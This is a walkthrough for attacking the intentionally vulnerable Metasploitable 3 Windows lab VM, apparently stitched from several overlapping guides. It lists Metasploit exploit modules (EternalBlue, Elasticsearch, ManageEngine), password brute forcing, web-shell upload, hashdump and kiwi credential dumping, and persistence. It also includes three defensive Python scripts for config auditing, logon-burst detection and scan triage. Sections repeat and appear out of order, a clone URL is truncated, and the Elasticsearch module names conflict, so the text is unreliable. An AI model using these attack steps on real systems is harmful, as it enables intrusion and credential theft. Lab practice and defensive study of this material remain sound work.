Metasploitable 3 Windows Walkthrough

If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.

This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills.

1. Lab Setup

Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.

Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin.

Build the VM:

mkdir metasploitable3 && cd metasploitable3
vagrant init rapid7/metasploitable3-win2k8
vagrant up

Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance.

2. Information Gathering

The first step in any engagement is reconnaissance. Let’s identify the open ports and services.

Nmap Scan:

nmap -sV -sC -O 192.168.x.x

You will notice a massive attack surface, including:

Port 80/443: IIS 7.5
Port 445: SMB
Port 1433: MSSQL
Port 3306: MySQL
Port 9200: Elasticsearch

3. Exploitation Path A: ElasticSearch (Remote Code Execution)

ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution.

Search for the exploit: In Metasploit, use search elasticsearch.

Configure:

use exploit/multi/elasticsearch/script_mvel_rce
set RHOSTS [Target IP]
set LHOST [Your IP]
exploit

Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed.

4. Exploitation Path B: ManageEngine Desktop Central

Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).

Search: use exploit/windows/http/manageengine_connectionid_write.

Execute: Set your RHOSTS and RPORT (usually 8020).

Result: This often grants SYSTEM level access immediately, as the service runs with high privileges.

5. Exploitation Path C: Weak Credentials (SMB/MSSQL)

Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.

SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.

MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell.

6. Post-Exploitation & Privilege Escalation

Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM.

Local Exploit Suggester:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

7. The Flags

Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.

Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.

By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.

Getting Metasploitable 3 up and running on a Windows host is like setting up a playground for aspiring ethical hackers. It’s an intentionally vulnerable machine designed by Rapid7 to help you practice everything from basic scanning to complex post-exploitation.

Prerequisites

Before diving in, make sure your host machine is ready. You’ll need:

VirtualBox or VMware: To host the virtual machine.

Vagrant: This automates the building and management of your VMs.

Packer: Used for creating the machine images.

High Specs: At least 8GB of RAM and 50GB of disk space are recommended since these builds can be heavy.

The Setup Process

Unlike Metasploitable 2, which was a simple downloadable file, Metasploitable 3 is built from scratch using scripts. This ensures you have the latest environment.

Install the Tools: Download and install VirtualBox, Vagrant, and Packer on your Windows machine.

Clone the Repository: Open PowerShell or Git Bash and run:

git clone https://github.com

Build the Image: Navigate into the folder and use Packer to build the Windows 2008 image. This step can take a while (30-60 minutes) as it downloads the ISO and installs the OS:

packer build windows_2008_r2.json

Launch with Vagrant: Once the build finishes, add the box to Vagrant and fire it up:

vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3-win
vagrant up

The Walkthrough: A Typical Attack Cycle

Once the machine is running, you can start your "engagement" from a separate Kali Linux VM.

1. Reconnaissance and Scanning

Start by finding the target's IP address. Use Nmap to see what ports are open:

nmap -sV -O [Target_IP]

You’ll notice a wide attack surface, including HTTP (80), SMB (445), and various database ports like MySQL (3306).

2. Exploiting Web Vulnerabilities

Metasploitable 3 hosts several web applications. One common target is the ManageEngine Desktop Central instance. You can search for an exploit in Metasploit:

msfconsole
search manageengine
use exploit/windows/http/manageengine_connectionid_write

Set your RHOSTS and LHOST, then run exploit to gain a shell.

3. SMB and Internal Services

The machine is also vulnerable to classic Windows exploits. If you find the EternalBlue (MS17-010) vulnerability is unpatched, you can jump straight to SYSTEM-level access.

use exploit/windows/smb/ms17_010_eternalblue
exploit

4. Post-Exploitation

Once you have a Meterpreter session, the real fun begins. You can:

Dump Hashes: Use hashdump to get user credentials.

Pivot: Use the machine as a jump box to explore other parts of the network.

Search for Flags: Metasploitable 3 includes "flags" (like a CTF) hidden throughout the system to reward your progress.

Conclusion

Metasploitable 3 is more than just a target; it’s a masterclass in how modern Windows environments are structured and where they typically fail. By building it yourself and walking through these exploits, you gain a deep understanding of both the "how" and the "why" of cybersecurity. Happy hacking—stay ethical!

One standout feature of Metasploitable 3 (Windows) is the Elasticsearch Remote Code Execution (RCE) vulnerability on Port 9200.

🛠️ Feature Spotlight: Elasticsearch Exploitation

This feature allows you to pivot from basic reconnaissance to a full command shell by exploiting a design flaw in the Elasticsearch scripting engine (CVE-2014-3120).

Service: Elasticsearch version 1.1.1.

Vulnerability: Improperly restricted scripting allows an attacker to execute arbitrary Java code.

The Payoff: Successfully running the exploit grants an initial Meterpreter shell, giving you direct access to the Windows file system and command prompt.

🚀 Quick Walkthrough Steps

If you want to test this specific feature, here is the high-level workflow:

Recon: Scan the target IP with Nmap to confirm Port 9200 is open.

Search: Open msfconsole and search for the exploit: search cve-2014-3120.

Configure:

use exploit/multi/elasticsearch/script_mvel_rce
set RHOSTS [Target_IP]

Exploit: Type exploit to launch the attack and drop into a Meterpreter session.

Verify: Use the sysinfo or getuid command to see your current system privileges.

📹 Video Guides

These videos cover the setup and initial exploitation scenarios for the Windows version of Metasploitable 3.

For a deeper dive, check out the comprehensive Metasploitable 3 Documentation or follow specific port-by-port walkthroughs on Medium.
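The Elasticsearch spotlight above (and Path B further down) comes down to two operator-controlled settings in elasticsearch.yml: dynamic scripting, which 1.1.x leaves on unless script.disable_dynamic is set to true, and the interface the REST API listens on. The following audit script is an added example, not code from this page or from Rapid7; the two sample config files are constructed, the flat key: value parser is an assumption that holds for ES 1.x configs, and the version cutoff (1.2.0 flipped the scripting default) is the one the CVE-2014-3120 advisories describe.

```python
"""Audit an Elasticsearch 1.x elasticsearch.yml for the settings that make the port-9200
dynamic-scripting path (CVE-2014-3120) reachable. Sample configs are constructed."""
import re
from typing import Dict, List, Tuple

# Constructed: a stock 1.1.x config with everything commented out, so defaults apply
# (dynamic scripting on, HTTP bound to every interface).
VULNERABLE_YML = """\
# cluster.name: elasticsearch
# node.name: "Franz Kafka"
# network.host: 192.168.0.1
http.port: 9200
"""

# Constructed: the same file with the two settings that close the path.
HARDENED_YML = """\
cluster.name: lab-es
script.disable_dynamic: true
network.host: 127.0.0.1
http.port: 9200
"""

LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "_local_"}


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Minimal parser for the flat `key: value` lines ES 1.x configs use; comments and blanks skipped."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("\"'")
    return settings


def version_tuple(version: str) -> Tuple[int, ...]:
    """'1.1.1' -> (1, 1, 1); tolerant of suffixes such as '1.1.1-SNAPSHOT'."""
    return tuple(int(n) for n in re.findall(r"\d+", version)[:3])


def assess(config_text: str, version: str) -> List[str]:
    """Return the findings that, together, make the walkthrough's Elasticsearch RCE work."""
    cfg = parse_flat_yaml(config_text)
    issues: List[str] = []

    # Before 1.2.0, dynamic (MVEL) scripting was enabled unless the operator turned it off;
    # 1.2.0 flipped the default, which is why the exploit targets 1.1.x builds.
    dynamic_on_by_default = version_tuple(version) < (1, 2, 0)
    disable = cfg.get("script.disable_dynamic", "").lower()
    if disable == "false" or (disable != "true" and dynamic_on_by_default):
        issues.append("dynamic scripting enabled: set script.disable_dynamic: true")

    # An unauthenticated REST API is only a problem if other hosts can reach it.
    if cfg.get("network.host", "") not in LOOPBACK_HOSTS:
        issues.append("REST API reachable from the network: set network.host: 127.0.0.1 or firewall tcp/9200")

    if dynamic_on_by_default:
        issues.append(f"Elasticsearch {version} predates the 1.2.0 scripting default change: upgrade")
    return issues


if __name__ == "__main__":
    for label, yml in (("vulnerable", VULNERABLE_YML), ("hardened", HARDENED_YML)):
        print(f"[{label}] 1.1.1:")
        for issue in assess(yml, "1.1.1") or ["no findings"]:
            print("  -", issue)
```

Run it against the file under the Elasticsearch config directory of the VM (vagrant / vagrant gets you in) to see which of the three findings apply; on the stock lab build all three do, and the first two are the ones a single config edit and a restart remove.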


This walkthrough for the Windows version of Metasploitable 3 (typically Windows Server 2008 R2) covers setup, reconnaissance, and common exploitation paths.

1. Setup and Installation

Metasploitable 3 is built using Vagrant and VirtualBox.

Requirements: Install Vagrant and VirtualBox on your host machine.

Deployment:

Create a project folder: mkdir metasploitable3-workspace && cd metasploitable3-workspace

Download the Vagrantfile from the Rapid7 GitHub.

Run vagrant up win2k8 to build and start the Windows VM (this may take 30–60 minutes).

Credentials: Default login is vagrant / vagrant.

Networking: Ensure the VM is set to a Host-Only or NAT Network (e.g., VirtualBox vboxnet0) to keep it isolated from the internet.

2. Reconnaissance (Information Gathering)

Start by identifying the target IP and open ports from your attack machine (e.g., Kali Linux).

Identify IP: Run ipconfig on the target Windows VM to find its address.

Nmap Scan: Run a comprehensive scan to find vulnerable services:

nmap -sV -sC -p- [Target_IP]

Key Ports to Watch:

Port 21 (FTP): Often contains weak credentials.

Port 80 (HTTP): Hosts vulnerable web applications like ManageEngine or Jenkins.

Port 445 (SMB): Susceptible to EternalBlue (MS17-010).

Port 3389 (RDP): Potential for BlueKeep or credential brute-forcing.

Port 9200 (Elasticsearch): Known Remote Code Execution (RCE) vulnerabilities.

3. Exploitation Walkthroughs

Path A: SMB EternalBlue (Port 445)

This is a critical RCE vulnerability in the SMBv1 protocol.

Search: In MSFConsole, use search ms17_010_eternalblue.

Select: use exploit/windows/smb/ms17_010_eternalblue.

Configure: Set RHOSTS to the target IP.

Run: Execute exploit to gain a SYSTEM-level Meterpreter shell.

Path B: Elasticsearch RCE (Port 9200)

Elasticsearch 1.1.1 on this machine allows unauthenticated dynamic script execution.

Search: search elasticsearch_script_exec.

Select: use exploit/multi/elasticsearch/search_groovy_script.

Configure: Set RHOSTS and your LHOST (Kali IP).

Run: Gain access as the user running the service.

Path C: FTP Brute Force & Web Shell (Port 21/80)

Brute Force: Use auxiliary/scanner/ftp/ftp_login with common wordlists to find credentials.

Upload: Log in via FTP and upload a PHP or ASPX web shell to the webroot (e.g., /www/wwwroot).

Execute: Navigate to the uploaded file via a browser to trigger your reverse shell.

4. Post-Exploitation

Once you have a shell (Meterpreter):

SysInfo: Run sysinfo to confirm target details.

Hashdump: Use hashdump to extract local user password hashes for offline cracking.

Persistence: Use the persistence module to maintain access after a reboot.


Part 4: Privilege Escalation – From User to SYSTEM

Your initial foothold might be NETWORK SERVICE or a low-priv user. Time to escalate.

Method A: Meterpreter (If you used MSF)

meterpreter > hashdump
# Or
meterpreter > load kiwi
meterpreter > creds_all

1. Environment Setup

Ensure both VMs can ping each other.


Step 5.2: WinRM PowerMove

If you have vagrant:vagrant or administrator:vagrant, you can use WinRM.

# Install evil-winrm
gem install evil-winrm
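Every credential path on this page (smb_login and ftp_login wordlists, RDP guessing, the sa password, and the vagrant:vagrant reuse over WinRM just above) leaves the same trace on the Windows side: a burst of failed logons (Security event 4625) from one source, then a successful one (4624) from the same source. The detector below is an added example, not part of this walkthrough or of any Rapid7 tooling; the event records are constructed projections of those two event IDs (logon type 3 = network, used by SMB and WinRM; 10 = RemoteInteractive, used by RDP), and the threshold and window are assumptions to tune.

```python
"""Flag password guessing against SMB/WinRM/RDP, and the logon that then uses the guessed
credentials, from Windows Security log events. Event records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

# 4625 = failed logon, 4624 = successful logon. Logon type 3 = network (SMB, WinRM),
# 10 = RemoteInteractive (RDP). Accounts and sources are the lab's, times are made up.
LOGON_TYPES = {3: "network", 10: "rdp"}
SAMPLE_EVENTS: List[Dict] = [
    {"time": "2024-03-01T09:00:00", "id": 4625, "type": 3, "account": "vagrant", "src": "192.168.56.101"},
    {"time": "2024-03-01T09:00:01", "id": 4625, "type": 3, "account": "vagrant", "src": "192.168.56.101"},
    {"time": "2024-03-01T09:00:02", "id": 4625, "type": 3, "account": "Administrator", "src": "192.168.56.101"},
    {"time": "2024-03-01T09:00:03", "id": 4625, "type": 3, "account": "Administrator", "src": "192.168.56.101"},
    {"time": "2024-03-01T09:00:04", "id": 4625, "type": 3, "account": "vagrant", "src": "192.168.56.101"},
    {"time": "2024-03-01T09:00:05", "id": 4625, "type": 3, "account": "vagrant", "src": "192.168.56.101"},
    {"time": "2024-03-01T09:00:40", "id": 4624, "type": 3, "account": "vagrant", "src": "192.168.56.101"},
    # An admin mistyping an RDP password twice from the jump host is not an attack.
    {"time": "2024-03-01T09:05:00", "id": 4625, "type": 10, "account": "Administrator", "src": "192.168.56.50"},
    {"time": "2024-03-01T09:05:09", "id": 4625, "type": 10, "account": "Administrator", "src": "192.168.56.50"},
    {"time": "2024-03-01T09:05:20", "id": 4624, "type": 10, "account": "Administrator", "src": "192.168.56.50"},
]

FAIL_THRESHOLD = 5             # this many failures from one source ...
WINDOW = timedelta(minutes=2)  # ... inside this window (assumed values; tune per environment)


class Alert(NamedTuple):
    kind: str     # "password_guessing" or "guessed_credential_used"
    src: str
    detail: str


def detect(events: List[Dict]) -> List[Alert]:
    """Single pass over time-ordered events with a sliding window of failures per source."""
    alerts: List[Alert] = []
    failures: Dict[str, List[datetime]] = defaultdict(list)
    already_flagged = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        src = ev["src"]
        # Drop failures that fell out of the window for this source.
        failures[src] = [t for t in failures[src] if ts - t <= WINDOW]
        if ev["id"] == 4625:
            failures[src].append(ts)
            if len(failures[src]) >= FAIL_THRESHOLD and src not in already_flagged:
                already_flagged.add(src)
                kind = LOGON_TYPES.get(ev["type"], str(ev["type"]))
                alerts.append(Alert("password_guessing", src,
                                    f"{len(failures[src])} failed {kind} logons in {WINDOW}"))
        elif ev["id"] == 4624 and len(failures[src]) >= FAIL_THRESHOLD:
            # A success right after a burst of failures means the wordlist hit: rotate that credential.
            kind = LOGON_TYPES.get(ev["type"], str(ev["type"]))
            alerts.append(Alert("guessed_credential_used", src, f"{ev['account']} via {kind}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.kind:<25} {alert.src:<16} {alert.detail}")
```

The second alert kind is the one worth paging on: a lone burst of 4625s is noise on a lab network, but a 4624 on its heels from the same source is exactly the moment evil-winrm or smb_login turns a wordlist into a shell, and the account named in it is the one to rotate.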

3.4 SMB Null Session & Enumeration

enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N   # null session

Mount share:

mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant

Step 2.2: Deep Service Version Scan

Now we figure out what is running.

nmap -sV -sC -O -p 80,445,3389,4848,8172,9200 192.168.56.102

Key Insight for Walkthrough: The presence of WinRM (port 47001) and SMB signing disabled will be our eventual keys to the kingdom.
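The service scans in this walkthrough (the nmap runs in the Information Gathering sections and the deep version scan just above) are also the defender's inventory: each open port maps to a specific path the later sections take and to a specific hardening step that removes it. The script below is an added example, not code from this page or from Rapid7. It parses nmap's -oX output; the scan file is a constructed sample whose ports and version strings mirror the ones the walkthrough names (IIS 7.5, Elasticsearch 1.1.1, ManageEngine on 8020, WinRM on 47001, SMB signing not required), and the port-to-remediation table is this example's own summary of the page's findings.

```python
"""Turn an `nmap -sV -sC -oX scan.xml <target>` run against the lab box into an exposure
checklist: for each open port this walkthrough calls out, the attacker path and what closes it.
The scan file below is constructed, not a live capture."""
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Tuple

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -oX scan.xml 192.168.56.102">
  <host>
    <address addr="192.168.56.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="Microsoft ftpd"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s" product="Microsoft SQL Server 2008 R2"/></port>
      <port protocol="tcp" portid="3306"><state state="closed"/><service name="mysql"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="8020"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="9200"><state state="open"/><service name="http" product="Elasticsearch REST API" version="1.1.1"/></port>
      <port protocol="tcp" portid="47001"><state state="open"/><service name="http" product="Microsoft HTTPAPI httpd" version="2.0"/></port>
    </ports>
    <hostscript>
      <script id="smb2-security-mode" output="2.02: Message signing enabled but not required"/>
    </hostscript>
  </host>
</nmaprun>
"""


class Finding(NamedTuple):
    port: int
    service: str
    attacker_path: str   # what this walkthrough does with the port
    fix: str             # what removes that path


# port -> (label, attacker path taken in the walkthrough, hardening step)
PORT_RULES = {
    21: ("ftp", "ftp_login wordlist, then web-shell upload to the webroot",
         "remove default/weak accounts and enforce strong passwords, or drop the service"),
    80: ("http", "outdated web apps (ManageEngine, Jenkins) behind IIS 7.5",
         "patch or remove the apps; keep admin consoles off untrusted networks"),
    445: ("smb", "MS17-010 EternalBlue, null-session enumeration, smb_login guessing",
          "install MS17-010, disable SMBv1, require SMB signing"),
    1433: ("mssql", "weak sa password, then mssql_payload shell",
           "strong or disabled sa account; restrict 1433 to trusted hosts"),
    3389: ("rdp", "BlueKeep or credential brute force",
           "patch, require Network Level Authentication, limit source IPs"),
    8020: ("manageengine", "Desktop Central upload RCE (CVE-2015-8249) with high privileges",
           "upgrade to a fixed build or remove it; run it as a low-privilege service account"),
    9200: ("elasticsearch", "unauthenticated dynamic scripting RCE (CVE-2014-3120)",
           "set script.disable_dynamic: true, bind to loopback, upgrade"),
    47001: ("winrm", "remote shell with the reused vagrant credentials (evil-winrm)",
            "rotate vagrant/Administrator passwords; restrict the WinRM listener"),
}


def _version(v: str) -> Tuple[int, ...]:
    """'1.1.1' -> (1, 1, 1); non-numeric parts count as 0."""
    return tuple(int("".join(c for c in part if c.isdigit()) or 0) for part in v.split("."))


def audit_nmap_xml(xml_text: str) -> List[Finding]:
    root = ET.fromstring(xml_text)
    findings: List[Finding] = []
    for host in root.iter("host"):
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            portid = int(port.get("portid"))
            if portid not in PORT_RULES:
                continue
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            label, path, fix = PORT_RULES[portid]
            # 1.2.0+ disables dynamic scripting by default, so the MVEL RCE path needs an older build.
            if portid == 9200 and version and _version(version) >= (1, 2):
                continue
            findings.append(Finding(portid, " ".join(x for x in (label, product, version) if x), path, fix))
        # NSE host scripts: the SMB signing state the walkthrough calls its "key to the kingdom".
        for script in host.iter("script"):
            if script.get("id") == "smb2-security-mode" and "not required" in script.get("output", ""):
                findings.append(Finding(445, "smb signing", "message signing not required, so relay/MITM is possible",
                                        "enable 'Microsoft network server: Digitally sign communications (always)'"))
    return sorted(findings)


if __name__ == "__main__":
    for f in audit_nmap_xml(SAMPLE_NMAP_XML):
        print(f"tcp/{f.port:<5} {f.service:<40} path: {f.attacker_path}")
        print(f"{'':>51}fix:  {f.fix}")
```

Feed it a real -oX file from the scan above and the checklist is the order in which to work through the later sections from the blue side: the closed MySQL port in the sample is skipped, a patched Elasticsearch build drops off the list, and the signing finding survives even when port 445 itself is patched.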